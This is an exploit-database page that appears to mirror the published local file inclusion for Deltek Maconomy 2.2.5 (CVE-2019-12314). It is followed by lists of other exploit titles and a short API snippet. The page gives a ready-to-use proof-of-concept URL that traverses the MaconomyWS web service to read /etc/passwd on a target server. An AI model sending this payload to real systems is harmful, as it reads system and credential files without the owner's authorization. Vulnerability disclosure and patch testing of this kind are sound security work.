"Deltek Maconomy 2.2.5 - Local File Inclusion"

Author

Exploit author

JameelNabbo

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-05-27

Download file

# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

Release Date	Title	Type	Platform	Author
2020-06-01	"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"	webapps	php	s1gh
2020-06-01	"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"	webapps	php	"Raphael Karger"
2020-06-01	"VMware vCenter Server 6.7 - Authentication Bypass"	webapps	multiple	Photubias
2020-05-29	"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"	webapps	multiple	"Halis Duraki"
2020-05-29	"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"	webapps	php	UnD3sc0n0c1d0
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-05-28	"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-28	"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"	webapps	php	Th3GundY
2020-05-28	"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"	webapps	multiple	"Berk Dusunur"
2020-05-27	"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"

Release Date	Title	Type	Platform	Author
2020-06-01	"VMware vCenter Server 6.7 - Authentication Bypass"	webapps	multiple	Photubias
2020-05-29	"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"	webapps	multiple	"Halis Duraki"
2020-05-28	"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"	webapps	multiple	"Berk Dusunur"
2020-05-22	"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)"	remote	multiple	Metasploit
2020-05-21	"OpenEDX platform Ironwood 2.5 - Remote Code Execution"	webapps	multiple	"Daniel Monzón"
2020-05-20	"BIND - 'TSIG' Denial of Service"	dos	multiple	"Teppei Fukuda"
2020-05-18	"HP LinuxKI 6.01 - Remote Command Injection"	remote	multiple	"Cody Winkler"
2020-05-11	"LibreNMS 1.46 - 'search' SQL Injection"	webapps	multiple	Punt
2020-05-05	"Saltstack 3000.1 - Remote Code Execution"	remote	multiple	"Jasper Lievisse Adriaanse"
2020-05-01	"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)"	remote	multiple	Metasploit

Release Date	Title	Type	Platform	Author
2019-06-04	"IceWarp 10.4.4 - Local File Inclusion"	webapps	php	JameelNabbo
2019-05-27	"Deltek Maconomy 2.2.5 - Local File Inclusion"	webapps	multiple	JameelNabbo
2019-05-23	"Nagios XI 5.6.1 - SQL injection"	webapps	php	JameelNabbo
2019-03-04	"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution"	webapps	hardware	JameelNabbo
2019-02-15	"Jinja2 2.10 - 'from_string' Server Side Template Injection"	webapps	python	JameelNabbo
2018-02-16	"Twig < 2.4.4 - Server Side Template Injection"	webapps	php	JameelNabbo

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/46931/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"Deltek Maconomy 2.2.5 - Local File Inclusion"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.